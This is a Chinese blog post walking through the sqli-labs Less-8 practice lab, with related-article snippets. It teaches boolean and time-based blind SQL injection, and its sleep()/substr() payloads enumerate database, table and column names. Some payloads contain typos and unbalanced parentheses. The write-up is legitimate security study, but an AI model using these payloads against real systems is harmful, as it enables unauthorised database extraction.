SQLI DUMB SERIES-8

最新推荐文章于 2024-06-06 11:11:56 发布
最新推荐文章于 2024-06-06 11:11:56 发布
阅读量756 收藏 3
点赞数
分类专栏: SQLI DUMB SERIES闯关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42395917/article/details/101227277
版权

SQLI DUMB SERIES-8思路

?id=1'--+

构造闭合发现没有回显

则我们使用盲注

盲注分为几种 

布尔型盲注

Length() //返回字符串长度

Substr() //取字符串 用法同下

mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为AB

left() //left(ABC,2)取字符串左边的几位 返回值为AB

right() //right(ABC,2)取字符串左边的几位 返回值为BC

ord()/ascii() //返回一个字符的ASCII码/返回一个数字对应ASCII码的字符

hex() //返回16进制数 hex编码

?id=1’ and mid(database(),1,8)=‘security’--+

时间型盲注

sleep(1) //睡1秒

交互时睡1秒

不交互时不延迟

if()函数 //判断后,true返回3,false返回4

if(1=1,3,4) 返回3

if(1=2,3,4) 返回4

?id=1’ and if(1=2,1,sleep(5))—+ //判断闭合

如果1=2正确 则睡眠5S 将1=2替换成SQL语句后可盲注

id=1’ and if((length(database()>1),sleep(4),0)--+ //增加1值来猜库名的长度

id 1’ and if((ascii(substr(database(),1,1)))>1),sleep(4),0)--+ //库名

id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = ‘your table’ and table_schema = 'your database’limit 0,1),1,1))>1),sleep(4),0)--+ //表名

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

通过改变盲注的ascii码来猜库名

i_momoe
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli labs 8 布尔盲注
Xiaoxiaoqiang_的博客
03-01 191
小学僧
SQLI DUMB SERIES-1-2
qq_43613144的博客
07-20 2378
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag。现在就是去探索方法 第一题 1.提示输入ID,提示也有get,所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤,然后可以进行 回显成功 回显失败、 所以说此处存在注入点 2.用order by判断列数 第三栏位存在,第四栏位不存在,所以说这个表只有三列 3.爆库 联合查询注...
Web_SQL盲注_布尔盲注(下方有实操)(DAY5)
CHUNJIUJUN的博客
07-30 257
盲注常用函数: left(a,b)从左侧截取 a 的前 b 位 substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。 mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位 ascii(str)返回给定字符的ascii值,如 ascii("a")=97 ord()函数同 ascii(),将字符转为 ascii 值 length(str)返回给定字符串的长度,如 length("string")=6 substr(a,b,c)图中在当前mysql数据库的库...
sqli-labs 靶场 less-5、6 第五关和第六关:判断注入点、使用错误函数注入爆库名、updatexml()函数
最新发布
Superstacks超全栈
06-06 651
updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。XML_document:是string格式,为XML文档对象的名称。new_value:string格式,替换查找到的符合条件的数据。继续判断字段数量,当数字为3时没报错,得知为3个字段。输入正确不返回数据,则我们通过。
SQLi Labs实验指导书
12-23
sqlilabs, 渗透测试, 网络攻防,数据库安全, mysqlsql
sqli-lab前四题, 8~10题
walnut_hetao的博客
11-19 211
sqli-lab前4题、8~10题
SQLI DUMB SERIES-2
weixin_34290096的博客
03-01 626
less2 同Less1相同,存在注入点 输入 ?id=1' 说明我们输入的数据被原封不动的带入了,无需要在1后面加单引号 (1)爆字段 ?id=1 order by 4 字段为3. (2)用union联合查询 ?id=-1 union select 1,version(),database() ...
SQLI DUMB SERIES-3
imomoe的博客
09-23 1064
?id=1’) 构造闭合 ?id=1’) --+ 注释后面内容 ?id=1’) order by 4–+ 4报错 3不报错 故有3列 ?id=-1’) union all select 1,2,3 from users–+ 在将?id=1改为?id=-1 使其为逻辑不正确值不显示输出 使得输出位输出后面的语句 ?id=-1’) union all select 1,2,table_name...
SQLI DUMB SERIES-1
weixin_33738578的博客
03-01 2994
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果:   现在可知,“ ' ”并没有被过滤,因此...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
SQLI DUMB SERIES-15
weixin_34335458的博客
04-14 127
(1)无论输入什么都没有回显,但是输入 admin'# 时会显示成功登录,说明闭合方式是单引号 (2)无回显,则使用盲注,可用用时间延迟攻击法。 测试时间延迟是否可行: uname=admin' and sleep(5) #&passwd=&submit=Submit 有明显延迟,测试成功。 (3)手工延迟注入与前面的手工注入相同,如爆库名 unam...
SQL DUMB Series-3 & 4 通关过程分享(sql注入学习DAY2)
deja_vuDM的博客
06-10 1156
单引号加括号,双引号加括号
SQL注入】靶场SQLI DUMB SERIES-24通过二次注入重置用户密码
开水的博客
02-21 207
先使用已知信息admin/admin登录进去查下题,发现可以修改密码。第三步,进入修改密码界面,随机输入一个旧密码,然后将需要重置的密码。第一步,注册一个新用户:admin’#/123456。,因此注释符#后面的内容都被注释,导致我们不需要知道。第二步,登录刚刚注册的admin’#用户。用户的密码,即可重置。
sqli-labs搭建闯关+蚁剑安装
不知名白帽的博客
05-26 1369
sqli-labs靶场的搭建,蚁剑的下载和安装,burpsuite的下载与破解,以及sqli-labs中的less-1(联合注入,报错注入),less-8(布尔盲注),less-9(时间盲注),less-11(POST注入),less-18(UA注入),less-20(COOKIE注入),less-33(宽字节注入),less-38(堆叠注入)等典型关卡...
sqli dumb series-1
03-16
sqli dumb series-1是一个SQL注入漏洞测试平台,用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例,用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并修复SQL注入漏洞,提高网站的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值